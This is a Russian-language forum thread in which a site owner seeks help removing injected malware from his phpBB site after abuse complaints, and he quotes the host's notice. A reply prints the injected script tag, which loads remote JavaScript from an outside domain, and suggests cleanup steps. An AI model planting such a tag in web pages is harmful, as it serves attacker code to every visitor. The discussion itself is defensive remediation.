Каскадный · [ Стандартный ] · Линейный Проблема с сайтом

[Dark Sol]

Может есть толковые пхп-программеры которые могут помочь.
Многие знают что у меня есть сайт http://www.sellvideogames.ru
сейчас он подзатух и у меня крайне мало времени им заниматься, но есть проблема которую я совсем не могу решить.
Постоянно приходят письма от хоста об абузе, якобы у меня там везде уязвимости и трояны. Одно время меня прикрыли в поиске яндекс и гугл, до сих пор не уверен что разблокировали.
Я раньше руками находил инъекции и вычищал их, всё ок было. Обычно рядовой редирект в яваскрипте на несуществуюший сайт.
Сейчас же я не пойму чо оно и где вообще

примерный текст жалобы которые сыпятся в хост:

> Dear abuse team,
>
> please have a look on these perhaps offending portals sites(1) so far.
>
> Notice: We do NOT urge you to shutdown your customer, but to inform him about a
> possible infection/misbehavior !
>
> status: As of 2015-12-19 06:26:36 CET
>
> Please preserve on any reply our Subject:
> [clean-mx-portals-11072125](80.93.62.42)-->(abuse@peterhost.ru) portals sites (1
> so far) within your network, please close them! status: As of 2015-12-19 06:26:36
> CET
>
>
> http://support.clean-mx.de/clean-mx/portal...&response=alive
>
> (for full uri, please scroll to the right end ...
>
> This information has been generated out of our comprehensive real time database,
> tracking worldwide portals URI's
>
> If your review this list of offending site(s), please do this carefully, pay
> attention for redirects also!
> Also, please consider this particular machines may have a root kit installed !
> So simply deleting some files or dirs or disabling cgi may not really solve the
> issue !
>
> Advice: The appearance of a Virus Site on a server means that
> someone intruded into the system. The server's owner should
> disconnect and not return the system into service until an
> audit is performed to ensure no data was lost, that all OS and
> internet software is up to date with the latest security fixes,
> and that any backdoors and other exploits left by the intruders
> are closed. Logs should be preserved and analyzed and, perhaps,
> the appropriate law enforcement agencies notified.
>
> DO NOT JUST DELETE THE FILES. IF YOU DO NOT FIX THE SECURITY
> PROBLEM, THEY WILL BE BACK!
>
> You may forward my information to law enforcement, CERTs,
> other responsible admins, or similar agencies.
>
> +-----------------------------------------------------------------------------------------------
>
> |date |id |virusname |ip |domain |Url|
> +-----------------------------------------------------------------------------------------------
> |2015-12-19 03:46:41 CET |11072125 |cysc.blacklisted.site.generic |80.93.62.42
> |sellvideogames.ru
> |http://sellvideogames.ru/mchat.php/styles/prosilver/template/style.php/styles/prosilver/theme/style.php?id=1&lang=ru&sid=c2014eaa66e99c7ae8bd034fa4724e2d%0A
> +-----------------------------------------------------------------------------------------------
>
>
> Your email address has been pulled out of whois concerning this offending network
> block(s).
> If you are not concerned with anti-fraud measurements, please forward this mail to
> the next responsible desk available...
>
>
> If you just close(d) these incident(s) please give us a feedback, our automatic
> walker process may not detect a closed case
>
>
> yours
>
> Gerhard W. Recher
> (CTO)
>
> net4sec UG (haftungsbeschraenkt)
>
> Leitenweg 6

===================

Отсюда два вопроса
1) как найти где это сидит?
2) как понять видят ли сайт гугл и яндекс?

[no_name]

походу дела ругается на это

CODE

<script type="text/javascript" src="http://zoloto.in/tpls/content/xr7dcvrz.php?id=4369347"></script>

если конечно ты не продвигаешь этот сайт. судя по тому что встречается в станице несколько раз то злодей сидит в каком то шаблоне.

по поиску - для начала поищи в тексте всех файлов zoloto.in

делать нужно следующее
1) обновить форум до актуальной версии, желательно с дропом всех файлов
2) изменить права на файлы таким образом что бы писать можно было только в те папки которые нужны для работы сайта (каталог куда загружаются ресурсы, кеш системы), а на остальные файлы только для чтения даже для пользователя от имени которого работает сайт.


Сообщение отредактировал no_name - Вторник, 22 декабря 2015, 18:15

[Dark Sol]

походу дела ругается на это

CODE

<script type="text/javascript" src="http://zoloto.in/tpls/content/xr7dcvrz.php?id=4369347"></script>

если конечно ты не продвигаешь этот сайт. судя по тому что встречается в станице несколько раз то злодей сидит в каком то шаблоне.

по поиску - для начала поищи в тексте всех файлов zoloto.in

делать нужно следующее
1) обновить форум до актуальной версии, желательно с дропом всех файлов
2) изменить права на файлы таким образом что бы писать можно было только в те папки которые нужны для работы сайта (каталог куда загружаются ресурсы, кеш системы), а на остальные файлы только для чтения даже для пользователя от имени которого работает сайт.

Вот раньше такая же инъекция была, плодился через ява-скрипт (js).
Оно там по всему сайту в каждой странице? А то я вроде не видел в каждой

[no_name]

Вот раньше такая же инъекция была, плодился через ява-скрипт (js).
Оно там по всему сайту в каждой странице? А то я вроде не видел в каждой

эта фигня сидит в каком то файле шаблона а он подключается на всех (или почти всех) страницах.

[Dark Sol]

просмотрел шаблон так и не понял где это говно сидит (
раньше сидело в яваскриптах шаблона, но теперь в упор не вижу.
попробую поставить редактор какой-нибудь и провести поиск внутри всех файлов

[Dark Sol]

просмотрел шаблон так и не понял где это говно сидит (
раньше сидело в яваскриптах шаблона, но теперь в упор не вижу.
попробую поставить редактор какой-нибудь и провести поиск внутри всех файлов

UPDATE: нашёл и вычистил шаблоны и кэш. Осталось поставить chmod на нужные папки